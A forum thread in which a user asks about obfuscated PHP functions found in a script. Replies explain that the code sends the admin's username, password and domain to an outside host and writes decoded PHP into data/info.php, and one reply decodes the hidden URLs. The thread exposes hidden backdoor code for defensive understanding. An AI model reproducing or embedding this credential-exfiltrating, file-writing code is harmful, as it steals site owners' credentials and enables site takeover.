Status
Not open for further replies.

wCruiser

Active Member
212
2008
0
0
If some one can help me explain this

Code:
function problem($error) {
ih();
echo iot('<font color="FF0000" size=3>ERROR</font><br><br>'.$error);
ift(); }
function b72($a) {
global $s;
$r = fetchURL(str_replace(' ','',base64_decode('aHR0cDovLzNidi5iaXovY2gvMS5waHA/c2M9').
"$s[cs]&u=$a[p_user]&p=$a[p_pass]&d=$a[p_domain]&url=$a[site_url]"));
if ($r) return $r; return false; }
function b63($a) { global $s; $sb = fopen("$s[phppath]/data/info.php",'w');
fwrite($sb,'<?PHP $info = base64_decode(\''.$a.'\'); ?>'); fclose($sb); 
if ($r[0]) return $r[0]; return false;
}


And this

Code:
function publisher_deleted($in) {
global $s;
check_admin('publishers');
publisher_delete_process($in[n]);
if ($s[no_stop]) return false;
ih();
echo iot('Selected publisher has been deleted');
if ($in[return_to]) echo '<a href="'.$in[return_to].'">Back to previous page</a><br><br>';
ift(); }
$s[sp] = base64_decode('aHR0cDovLzNidi5iaXovY2gvMi5waHA/c2M9').$s[cs].'&x=';


It would be really helpful for me
 
6 comments
What this is doing is sending your pass and username to another script

lol this is what hackers use to get your ps

PHP:
"$s[cs]&u=$a[p_user]&p=$a[p_pass]&d=$a[p_domain]&url=$a[site_url]"

sends to there script

PHP:
"?u=USER&p=PASS&d=DOMAIN&url=SCRIPT_URL"

and also looks like its writing external php commands to a file where he can exploit your site with a shell!
 
base64_decode('aHR0cDovLzNidi5iaXovY2gvMS5waHA/c2M9'):
Code:
[URL]http://3bv.biz/ch/1.php?sc=[/URL]
base64_decode('aHR0cDovLzNidi5iaXovY2gvMi5waHA/c2M9')
Code:
[URL]http://3bv.biz/ch/2.php?sc=[/URL]

Hope this helps in some way :)
 
Status
Not open for further replies.
Back
Top